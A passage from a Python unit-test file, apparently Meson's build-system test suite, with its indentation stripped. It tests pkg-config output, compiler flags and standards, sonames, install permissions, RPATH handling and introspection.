self.new_builddir()
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen', 'dependencies')
self.init(testdir)
self.build()
self.run_tests()
def test_pkg_unfound(self):
testdir = os.path.join(self.unit_test_dir, '23 unfound pkgconfig')
self.init(testdir)
with open(os.path.join(self.privatedir, 'somename.pc')) as f:
pcfile = f.read()
self.assertFalse('blub_blob_blib' in pcfile)
def test_vala_c_warnings(self):
'''
Test that no warnings are emitted for C code generated by Vala. This
can't be an ordinary test case because we need to inspect the compiler
database.
https://github.com/mesonbuild/meson/issues/864
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '5 target glib')
self.init(testdir)
compdb = self.get_compdb()
vala_command = None
c_command = None
for each in compdb:
if each['file'].endswith('GLib.Thread.c'):
vala_command = each['command']
elif each['file'].endswith('GLib.Thread.vala'):
continue
elif each['file'].endswith('retcode.c'):
c_command = each['command']
else:
m = 'Unknown file {!r} in vala_c_warnings test'.format(each['file'])
raise AssertionError(m)
self.assertIsNotNone(vala_command)
self.assertIsNotNone(c_command)
# -w suppresses all warnings, should be there in Vala but not in C
self.assertIn(" -w ", vala_command)
self.assertNotIn(" -w ", c_command)
# -Wall enables all warnings, should be there in C but not in Vala
self.assertNotIn(" -Wall ", vala_command)
self.assertIn(" -Wall ", c_command)
# -Werror converts warnings to errors, should always be there since it's
# injected by an unrelated piece of code and the project has werror=true
self.assertIn(" -Werror ", vala_command)
self.assertIn(" -Werror ", c_command)
@skipIfNoPkgconfig
def test_qtdependency_pkgconfig_detection(self):
'''
Test that qt4 and qt5 detection with pkgconfig works.
'''
# Verify Qt4 or Qt5 can be found with pkg-config
qt4 = subprocess.call(['pkg-config', '--exists', 'QtCore'])
qt5 = subprocess.call(['pkg-config', '--exists', 'Qt5Core'])
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=pkg-config'])
# Confirm that the dependency was found with pkg-config
mesonlog = self.get_meson_log()
if qt4 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt4 \(modules: Core\) found: YES 4.* \(pkg-config\)\n')
if qt5 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES 5.* \(pkg-config\)\n')
@skip_if_not_base_option('b_sanitize')
def test_generate_gir_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
def test_qt5dependency_qmake_detection(self):
'''
Test that qt5 detection with qmake works. This can't be an ordinary
test case because it involves setting the environment.
'''
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake'):
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output:
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Disable pkg-config codepath and force searching with qmake/qmake-qt5
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=qmake'])
# Confirm that the dependency was found with qmake
mesonlog = self.get_meson_log()
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES .* \((qmake|qmake-qt5)\)\n')
def glob_sofiles_without_privdir(self, g):
files = glob(g)
return [f for f in files if not f.endswith('.p')]
def _test_soname_impl(self, libpath, install):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF and linuxlike sonames')
testdir = os.path.join(self.unit_test_dir, '1 soname')
self.init(testdir)
self.build()
if install:
self.install()
# File without aliases set.
nover = os.path.join(libpath, 'libnover.so')
self.assertPathExists(nover)
self.assertFalse(os.path.islink(nover))
self.assertEqual(get_soname(nover), 'libnover.so')
self.assertEqual(len(self.glob_sofiles_without_privdir(nover[:-3] + '*')), 1)
# File with version set
verset = os.path.join(libpath, 'libverset.so')
self.assertPathExists(verset + '.4.5.6')
self.assertEqual(os.readlink(verset), 'libverset.so.4')
self.assertEqual(get_soname(verset), 'libverset.so.4')
self.assertEqual(len(self.glob_sofiles_without_privdir(verset[:-3] + '*')), 3)
# File with soversion set
soverset = os.path.join(libpath, 'libsoverset.so')
self.assertPathExists(soverset + '.1.2.3')
self.assertEqual(os.readlink(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(get_soname(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(len(self.glob_sofiles_without_privdir(soverset[:-3] + '*')), 2)
# File with version and soversion set to same values
settosame = os.path.join(libpath, 'libsettosame.so')
self.assertPathExists(settosame + '.7.8.9')
self.assertEqual(os.readlink(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(get_soname(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(len(self.glob_sofiles_without_privdir(settosame[:-3] + '*')), 2)
# File with version and soversion set to different values
bothset = os.path.join(libpath, 'libbothset.so')
self.assertPathExists(bothset + '.1.2.3')
self.assertEqual(os.readlink(bothset), 'libbothset.so.1.2.3')
self.assertEqual(os.readlink(bothset + '.1.2.3'), 'libbothset.so.4.5.6')
self.assertEqual(get_soname(bothset), 'libbothset.so.1.2.3')
self.assertEqual(len(self.glob_sofiles_without_privdir(bothset[:-3] + '*')), 3)
def test_soname(self):
self._test_soname_impl(self.builddir, False)
def test_installed_soname(self):
libdir = self.installdir + os.path.join(self.prefix, self.libdir)
self._test_soname_impl(libdir, True)
def test_compiler_check_flags_order(self):
'''
Test that compiler check flags override all other flags. This can't be
an ordinary test case because it needs the environment to be set.
'''
testdir = os.path.join(self.common_test_dir, '39 has function')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
Oflag = '-O3'
OflagCPP = Oflag
if cpp.get_id() in ('clang', 'gcc'):
# prevent developers from adding "int main(int argc, char **argv)"
# to small Meson checks unless these parameters are actually used
OflagCPP += ' -Werror=unused-parameter'
env = {'CFLAGS': Oflag,
'CXXFLAGS': OflagCPP}
self.init(testdir, override_envvars=env)
cmds = self.get_meson_log_compiler_checks()
for cmd in cmds:
if cmd[0] == 'ccache':
cmd = cmd[1:]
# Verify that -I flags from the `args` kwarg are first
# This is set in the '39 has function' test case
self.assertEqual(cmd[1], '-I/tmp')
# Verify that -O3 set via the environment is overridden by -O0
Oargs = [arg for arg in cmd if arg.startswith('-O')]
self.assertEqual(Oargs, [Oflag, '-O0'])
def _test_stds_impl(self, testdir, compiler, p: str):
has_cpp17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=5.0.0', '>=9.1') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=5.0.0'))
has_cpp2a_c17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=6.0.0', '>=10.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
has_c18 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=8.0.0', '>=11.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
# Check that all the listed -std=xxx options for this compiler work just fine when used
# https://en.wikipedia.org/wiki/Xcode#Latest_versions
# https://www.gnu.org/software/gcc/projects/cxx-status.html
for v in compiler.get_options()['std'].choices:
lang_std = p + '_std'
# we do it like this to handle gnu++17,c++17 and gnu17,c17 cleanly
# thus, C++ first
if '++17' in v and not has_cpp17:
continue
elif '++2a' in v and not has_cpp2a_c17: # https://en.cppreference.com/w/cpp/compiler_support
continue
# now C
elif '17' in v and not has_cpp2a_c17:
continue
elif '18' in v and not has_c18:
continue
std_opt = '{}={}'.format(lang_std, v)
self.init(testdir, extra_args=['-D' + std_opt])
cmd = self.get_compdb()[0]['command']
# c++03 and gnu++03 are not understood by ICC, don't try to look for them
skiplist = frozenset([
('intel', 'c++03'),
('intel', 'gnu++03')])
if v != 'none' and not (compiler.get_id(), v) in skiplist:
cmd_std = " -std={} ".format(v)
self.assertIn(cmd_std, cmd)
try:
self.build()
except Exception:
print('{} was {!r}'.format(lang_std, v))
raise
self.wipe()
# Check that an invalid std option in CFLAGS/CPPFLAGS fails
# Needed because by default ICC ignores invalid options
cmd_std = '-std=FAIL'
if p == 'c':
env_flag_name = 'CFLAGS'
elif p == 'cpp':
env_flag_name = 'CXXFLAGS'
else:
raise NotImplementedError('Language {} not defined.'.format(p))
env = {}
env[env_flag_name] = cmd_std
with self.assertRaises((subprocess.CalledProcessError, mesonbuild.mesonlib.EnvironmentException),
msg='C compiler should have failed with -std=FAIL'):
self.init(testdir, override_envvars = env)
# ICC won't fail in the above because additional flags are needed to
# make unknown -std=... options errors.
self.build()
def test_compiler_c_stds(self):
'''
Test that C stds specified for this compiler can all be used. Can't be
an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cc, 'c')
def test_compiler_cpp_stds(self):
'''
Test that C++ stds specified for this compiler can all be used. Can't
be an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '2 cpp')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cpp, 'cpp')
def test_unity_subproj(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir, extra_args='--unity=subprojects')
pdirs = glob(os.path.join(self.builddir, 'subprojects/sublib/simpletest*.p'))
self.assertEqual(len(pdirs), 1)
self.assertPathExists(os.path.join(pdirs[0], 'simpletest-unity0.c'))
sdirs = glob(os.path.join(self.builddir, 'subprojects/sublib/*sublib*.p'))
self.assertEqual(len(sdirs), 1)
self.assertPathExists(os.path.join(sdirs[0], 'sublib-unity0.c'))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'user@exe/user-unity.c'))
self.build()
def test_installed_modes(self):
'''
Test that files installed by these tests have the correct permissions.
Can't be an ordinary test because our installed_files.txt is very basic.
'''
# Test file modes
testdir = os.path.join(self.common_test_dir, '12 data')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'etc', 'etcfile.dat')
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'rw------T'
self.assertEqual(want_mode, found_mode[1:])
f = os.path.join(self.installdir, 'usr', 'bin', 'runscript.sh')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-sr-x'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
self.assertEqual(0, statf.st_gid)
f = os.path.join(self.installdir, 'usr', 'share', 'progname',
'fileobject_datafile.dat')
orig = os.path.join(testdir, 'fileobject_datafile.dat')
statf = os.stat(f)
statorig = os.stat(orig)
found_mode = stat.filemode(statf.st_mode)
orig_mode = stat.filemode(statorig.st_mode)
self.assertEqual(orig_mode[1:], found_mode[1:])
self.assertEqual(os.getuid(), statf.st_uid)
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_gid)
self.wipe()
# Test directory modes
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'usr', 'share', 'sub1', 'second.dat')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-x--t'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
def test_installed_modes_extended(self):
'''
Test that files are installed with correct permissions using install_mode.
'''
testdir = os.path.join(self.common_test_dir, '195 install_mode')
self.init(testdir)
self.build()
self.install()
for fsobj, want_mode in [
('bin', 'drwxr-x---'),
('bin/runscript.sh', '-rwxr-sr-x'),
('bin/trivialprog', '-rwxr-sr-x'),
('include', 'drwxr-x---'),
('include/config.h', '-rw-rwSr--'),
('include/rootdir.h', '-r--r--r-T'),
('lib', 'drwxr-x---'),
('lib/libstat.a', '-rw---Sr--'),
('share', 'drwxr-x---'),
('share/man', 'drwxr-x---'),
('share/man/man1', 'drwxr-x---'),
('share/man/man1/foo.1', '-r--r--r-T'),
('share/sub1', 'drwxr-x---'),
('share/sub1/second.dat', '-rwxr-x--t'),
('subdir', 'drwxr-x---'),
('subdir/data.dat', '-rw-rwSr--'),
]:
f = os.path.join(self.installdir, 'usr', *fsobj.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(fsobj, want_mode, found_mode)))
# Ensure that introspect --installed works on all types of files
# FIXME: also verify the files list
self.introspect('--installed')
def test_install_umask(self):
'''
Test that files are installed with correct permissions using default
install umask of 022, regardless of the umask at time the worktree
was checked out or the build was executed.
'''
# Copy source tree to a temporary directory and change permissions
# there to simulate a checkout with umask 002.
orig_testdir = os.path.join(self.unit_test_dir, '26 install umask')
# Create a new testdir under tmpdir.
tmpdir = os.path.realpath(tempfile.mkdtemp())
self.addCleanup(windows_proof_rmtree, tmpdir)
testdir = os.path.join(tmpdir, '26 install umask')
# Copy the tree using shutil.copyfile, which will use the current umask
# instead of preserving permissions of the old tree.
save_umask = os.umask(0o002)
self.addCleanup(os.umask, save_umask)
shutil.copytree(orig_testdir, testdir, copy_function=shutil.copyfile)
# Preserve the executable status of subdir/sayhello though.
os.chmod(os.path.join(testdir, 'subdir', 'sayhello'), 0o775)
self.init(testdir)
# Run the build under a 027 umask now.
os.umask(0o027)
self.build()
# And keep umask 027 for the install step too.
self.install()
for executable in [
'bin/prog',
'share/subdir/sayhello',
]:
f = os.path.join(self.installdir, 'usr', *executable.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(executable, want_mode, found_mode)))
for directory in [
'usr',
'usr/bin',
'usr/include',
'usr/share',
'usr/share/man',
'usr/share/man/man1',
'usr/share/subdir',
]:
f = os.path.join(self.installdir, *directory.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'drwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected directory %s to have mode %s but found %s instead.' %
(directory, want_mode, found_mode)))
for datafile in [
'include/sample.h',
'share/datafile.cat',
'share/file.dat',
'share/man/man1/prog.1',
'share/subdir/datafile.dog',
]:
f = os.path.join(self.installdir, 'usr', *datafile.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rw-r--r--'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(datafile, want_mode, found_mode)))
def test_cpp_std_override(self):
testdir = os.path.join(self.unit_test_dir, '6 std override')
self.init(testdir)
compdb = self.get_compdb()
# Don't try to use -std=c++03 as a check for the
# presence of a compiler flag, as ICC does not
# support it.
for i in compdb:
if 'prog98' in i['file']:
c98_comp = i['command']
if 'prog11' in i['file']:
c11_comp = i['command']
if 'progp' in i['file']:
plain_comp = i['command']
self.assertNotEqual(len(plain_comp), 0)
self.assertIn('-std=c++98', c98_comp)
self.assertNotIn('-std=c++11', c98_comp)
self.assertIn('-std=c++11', c11_comp)
self.assertNotIn('-std=c++98', c11_comp)
self.assertNotIn('-std=c++98', plain_comp)
self.assertNotIn('-std=c++11', plain_comp)
# Now werror
self.assertIn('-Werror', plain_comp)
self.assertNotIn('-Werror', c98_comp)
def test_run_installed(self):
if is_cygwin() or is_osx():
raise unittest.SkipTest('LD_LIBRARY_PATH and RPATH not applicable')
testdir = os.path.join(self.unit_test_dir, '7 run installed')
self.init(testdir)
self.build()
self.install()
installed_exe = os.path.join(self.installdir, 'usr/bin/prog')
installed_libdir = os.path.join(self.installdir, 'usr/foo')
installed_lib = os.path.join(installed_libdir, 'libfoo.so')
self.assertTrue(os.path.isfile(installed_exe))
self.assertTrue(os.path.isdir(installed_libdir))
self.assertTrue(os.path.isfile(installed_lib))
# Must fail when run without LD_LIBRARY_PATH to ensure that
# rpath has been properly stripped rather than pointing to the builddir.
self.assertNotEqual(subprocess.call(installed_exe, stderr=subprocess.DEVNULL), 0)
# When LD_LIBRARY_PATH is set it should start working.
# For some reason setting LD_LIBRARY_PATH in os.environ fails
# when all tests are run (but works when only this test is run),
# but doing this explicitly works.
env = os.environ.copy()
env['LD_LIBRARY_PATH'] = ':'.join([installed_libdir, env.get('LD_LIBRARY_PATH', '')])
self.assertEqual(subprocess.call(installed_exe, env=env), 0)
# Ensure that introspect --installed works
installed = self.introspect('--installed')
for v in installed.values():
self.assertTrue('prog' in v or 'foo' in v)
@skipIfNoPkgconfig
def test_order_of_l_arguments(self):
testdir = os.path.join(self.unit_test_dir, '8 -L -l order')
self.init(testdir, override_envvars={'PKG_CONFIG_PATH': testdir})
# NOTE: .pc file has -Lfoo -lfoo -Lbar -lbar but pkg-config reorders
# the flags before returning them to -Lfoo -Lbar -lfoo -lbar
# but pkgconf seems to not do that. Sigh. Support both.
expected_order = [('-L/me/first', '-lfoo1'),
('-L/me/second', '-lfoo2'),
('-L/me/first', '-L/me/second'),
('-lfoo1', '-lfoo2'),
('-L/me/second', '-L/me/third'),
('-L/me/third', '-L/me/fourth',),
('-L/me/third', '-lfoo3'),
('-L/me/fourth', '-lfoo4'),
('-lfoo3', '-lfoo4'),
]
with open(os.path.join(self.builddir, 'build.ninja')) as ifile:
for line in ifile:
if expected_order[0][0] in line:
for first, second in expected_order:
self.assertLess(line.index(first), line.index(second))
return
raise RuntimeError('Linker entries not found in the Ninja file.')
def test_introspect_dependencies(self):
'''
Tests that mesonintrospect --dependencies returns expected output.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir)
glib_found = False
gobject_found = False
deps = self.introspect('--dependencies')
self.assertIsInstance(deps, list)
for dep in deps:
self.assertIsInstance(dep, dict)
self.assertIn('name', dep)
self.assertIn('compile_args', dep)
self.assertIn('link_args', dep)
if dep['name'] == 'glib-2.0':
glib_found = True
elif dep['name'] == 'gobject-2.0':
gobject_found = True
self.assertTrue(glib_found)
self.assertTrue(gobject_found)
if subprocess.call(['pkg-config', '--exists', 'glib-2.0 >= 2.56.2']) != 0:
raise unittest.SkipTest('glib >= 2.56.2 needed for the rest')
targets = self.introspect('--targets')
docbook_target = None
for t in targets:
if t['name'] == 'generated-gdbus-docbook':
docbook_target = t
break
self.assertIsInstance(docbook_target, dict)
self.assertEqual(os.path.basename(t['filename'][0]), 'generated-gdbus-doc-' + os.path.basename(t['target_sources'][0]['sources'][0]))
def test_introspect_installed(self):
testdir = os.path.join(self.linuxlike_test_dir, '7 library versions')
self.init(testdir)
install = self.introspect('--installed')
install = {os.path.basename(k): v for k, v in install.items()}
print(install)
if is_osx():
the_truth = {
'libmodule.dylib': '/usr/lib/libmodule.dylib',
'libnoversion.dylib': '/usr/lib/libnoversion.dylib',
'libonlysoversion.5.dylib': '/usr/lib/libonlysoversion.5.dylib',
'libonlysoversion.dylib': '/usr/lib/libonlysoversion.dylib',
'libonlyversion.1.dylib': '/usr/lib/libonlyversion.1.dylib',
'libonlyversion.dylib': '/usr/lib/libonlyversion.dylib',
'libsome.0.dylib': '/usr/lib/libsome.0.dylib',
'libsome.dylib': '/usr/lib/libsome.dylib',
}
the_truth_2 = {'/usr/lib/libsome.dylib',
'/usr/lib/libsome.0.dylib',
}
else:
the_truth = {
'libmodule.so': '/usr/lib/libmodule.so',
'libnoversion.so': '/usr/lib/libnoversion.so',
'libonlysoversion.so': '/usr/lib/libonlysoversion.so',
'libonlysoversion.so.5': '/usr/lib/libonlysoversion.so.5',
'libonlyversion.so': '/usr/lib/libonlyversion.so',
'libonlyversion.so.1': '/usr/lib/libonlyversion.so.1',
'libonlyversion.so.1.4.5': '/usr/lib/libonlyversion.so.1.4.5',
'libsome.so': '/usr/lib/libsome.so',
'libsome.so.0': '/usr/lib/libsome.so.0',
'libsome.so.1.2.3': '/usr/lib/libsome.so.1.2.3',
}
the_truth_2 = {'/usr/lib/libsome.so',
'/usr/lib/libsome.so.0',
'/usr/lib/libsome.so.1.2.3'}
self.assertDictEqual(install, the_truth)
targets = self.introspect('--targets')
for t in targets:
if t['name'] != 'some':
continue
self.assertSetEqual(the_truth_2, set(t['install_filename']))
def test_build_rpath(self):
if is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
self.init(testdir)
self.build()
# C program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/prog'))
self.assertEqual(install_rpath, '/baz')
# C++ program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'progcxx'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/progcxx'))
self.assertEqual(install_rpath, 'baz')
def test_global_rpath(self):
if is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
if is_osx():
raise unittest.SkipTest('Global RPATHs via LDFLAGS not yet supported on MacOS (does anybody need it?)')
testdir = os.path.join(self.unit_test_dir, '80 global-rpath')
oldinstalldir = self.installdir
# Build and install an external library without DESTDIR.
# The external library generates a .pc file without an rpath.
yonder_dir = os.path.join(testdir, 'yonder')
yonder_prefix = os.path.join(oldinstalldir, 'yonder')
yonder_libdir = os.path.join(yonder_prefix, self.libdir)
self.prefix = yonder_prefix
self.installdir = yonder_prefix
self.init(yonder_dir)
self.build()
self.install(use_destdir=False)
# Since rpath has multiple valid formats we need to
# test that they are all properly used.
rpath_formats = [
('-Wl,-rpath=', False),
('-Wl,-rpath,', False),
('-Wl,--just-symbols=', True),
('-Wl,--just-symbols,', True),
('-Wl,-R', False),
('-Wl,-R,', False)
]
for rpath_format, exception in rpath_formats:
# Build an app that uses that installed library.
# Supply the rpath to the installed library via LDFLAGS
# (as systems like buildroot and guix are wont to do)
# and verify install preserves that rpath.
self.new_builddir()
env = {'LDFLAGS': rpath_format + yonder_libdir,
'PKG_CONFIG_PATH': os.path.join(yonder_libdir, 'pkgconfig')}
if exception:
with self.assertRaises(subprocess.CalledProcessError):
self.init(testdir, override_envvars=env)
continue
self.init(testdir, override_envvars=env)
self.build()
self.install(use_destdir=False)
got_rpath = get_rpath(os.path.join(yonder_prefix, 'bin/rpathified'))
self.assertEqual(got_rpath, yonder_libdir, rpath_format)
@skip_if_not_base_option('b_sanitize')
def test_pch_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.common_test_dir, '13 pch')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
compdb = self.get_compdb()
for i in compdb:
self.assertIn("-fsanitize=address", i["command"])
def test_cross_find_program(self):
testdir = os.path.join(self.unit_test_dir, '11 cross prog')
crossfile = tempfile.NamedTemporaryFile(mode='w')
print(os.path.join(testdir, 'some_cross_tool.py'))
crossfile.write(textwrap.dedent('''\
[binaries]
c = '/usr/bin/{1}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
sometool.py = ['{0}']
someothertool.py = '{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7' # Not sure if correct.
endian = 'little'
''').format(os.path.join(testdir, 'some_cross_tool.py'),
'gcc' if is_sunos() else 'cc'))
crossfile.flush()
self.meson_cross_file = crossfile.name
self.init(testdir)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '13 reconfigure')
self.init(testdir, extra_args=['-Db_coverage=true'], default_args=False)
self.build('reconfigure')
def test_vala_generated_source_buildir_inside_source_tree(self):
'''
Test that valac outputs generated C files in the expected location when
the builddir is a subdir of the source tree.
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '8 generated sources')
newdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, newdir)
testdir = newdir
# New builddir
builddir = os.path.join(testdir, 'subdir/_build')
os.makedirs(builddir, exist_ok=True)
self.change_builddir(builddir)
self.init(testdir)
self.build()
def test_old_gnome_module_codepaths(self):
'''
A lot of code in the GNOME module is conditional on the version of the
glib tools that are installed, and breakages in the old code can slip
by once the CI has a newer glib version. So we force the GNOME module
to pretend that it's running on an ancient glib so the fallback code is
also tested.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
mesonbuild.modules.gnome.native_glib_version = '2.20'
env = {'MESON_UNIT_TEST_PRETEND_GLIB_OLD': "1"}
try:
self.init(testdir,
inprocess=True,
override_envvars=env)
self.build(override_envvars=env)
finally:
mesonbuild.modules.gnome.native_glib_version = None
@skipIfNoPkgconfig
def test_pkgconfig_usage(self):
testdir1 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependency')
testdir2 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependee')
if subprocess.call(['pkg-config', '--cflags', 'glib-2.0'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) != 0:
raise unittest.SkipTest('Glib 2.0 dependency not available.')
with tempfile.TemporaryDirectory() as tempdirname:
self.init(testdir1, extra_args=['--prefix=' + tempdirname, '--libdir=lib'], default_args=False)
self.install(use_destdir=False)
shutil.rmtree(self.builddir)
os.mkdir(self.builddir)
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'libpkgdep.pc')))
lib_dir = os.path.join(tempdirname, 'lib')
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = pkg_dir
# Private internal libraries must not leak out.
pkg_out = subprocess.check_output(['pkg-config', '--static', '--libs', 'libpkgdep'], env=myenv)
self.assertFalse(b'libpkgdep-int' in pkg_out, 'Internal library leaked out.')
# Dependencies must not leak to cflags when building only a shared library.
pkg_out = subprocess.check_output(['pkg-config', '--cflags', 'libpkgdep'], env=myenv)
self.assertFalse(b'glib' in pkg_out, 'Internal dependency leaked to headers.')
# Test that the result is usable.
self.init(testdir2, override_envvars=myenv)
self.build(override_envvars=myenv)
myenv = os.environ.copy()
myenv['LD_LIBRARY_PATH'] = ':'.join([lib_dir, myenv.get('LD_LIBRARY_PATH', '')])
if is_cygwin():
bin_dir = os.path.join(tempdirname, 'bin')
myenv['PATH'] = bin_dir + os.pathsep + myenv['PATH']
self.assertTrue(os.path.isdir(lib_dir))
test_exe = os.path.join(self.builddir, 'pkguser')
self.assertTrue(os.path.isfile(test_exe))
subprocess.check_call(test_exe, env=myenv)
@skipIfNoPkgconfig
def test_pkgconfig_relative_paths(self):
testdir = os.path.join(self.unit_test_dir, '62 pkgconfig relative paths')
pkg_dir = os.path.join(testdir, 'pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'librelativepath.pc')))
env = get_fake_env(testdir, self.builddir, self.prefix)
env.coredata.set_options({'pkg_config_path': pkg_dir}, subproject='')
kwargs = {'required': True, 'silent': True}
relative_path_dep = PkgConfigDependency('librelativepath', env, kwargs)
self.assertTrue(relative_path_dep.found())
# Ensure link_args are properly quoted
libpath = Path(self.builddir) / '../relativepath/lib'
link_args = ['-L' + libpath.as_posix(), '-lrelativepath']
self.assertEqual(relative_path_dep.get_link_args(), link_args)
@skipIfNoPkgconfig
def test_pkgconfig_internal_libraries(self):
'''
'''
with tempfile.TemporaryDirectory() as tempdirname:
# build library
testdirbase = os.path.join(self.unit_test_dir, '32 pkgconfig use libraries')
testdirlib = os.path.join(testdirbase, 'lib')
self.init(testdirlib, extra_args=['--prefix=' + tempdirname,
'--libdir=lib',
'--default-library=static'], default_args=False)
self.build()
self.install(use_destdir=False)
# build user of library
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_static_archive_stripping(self):
'''
Check that Meson produces valid static archives with --strip enabled
'''
with tempfile.TemporaryDirectory() as tempdirname:
testdirbase = os.path.join(self.unit_test_dir, '67 static archive stripping')
# build lib
self.new_builddir()
testdirlib = os.path.join(testdirbase, 'lib')
testlibprefix = os.path.join(tempdirname, 'libprefix')
self.init(testdirlib, extra_args=['--prefix=' + testlibprefix,
'--libdir=lib',
'--default-library=static',
'--buildtype=debug',
'--strip'], default_args=False)
self.build()
self.install(use_destdir=False)
# build executable (uses lib, fails if static archive has been stripped incorrectly)
pkg_dir = os.path.join(testlibprefix, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_pkgconfig_formatting(self):
testdir = os.path.join(self.unit_test_dir, '38 pkgconfig format')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs-only-l', 'libsomething'], env=myenv)
deps = [b'-lgobject-2.0', b'-lgio-2.0', b'-lglib-2.0', b'-lsomething']
if is_windows() or is_cygwin() or is_osx() or is_openbsd():
# On Windows, libintl is a separate library
deps.append(b'-lintl')
self.assertEqual(set(deps), set(stdo.split()))
@skipIfNoPkgconfig
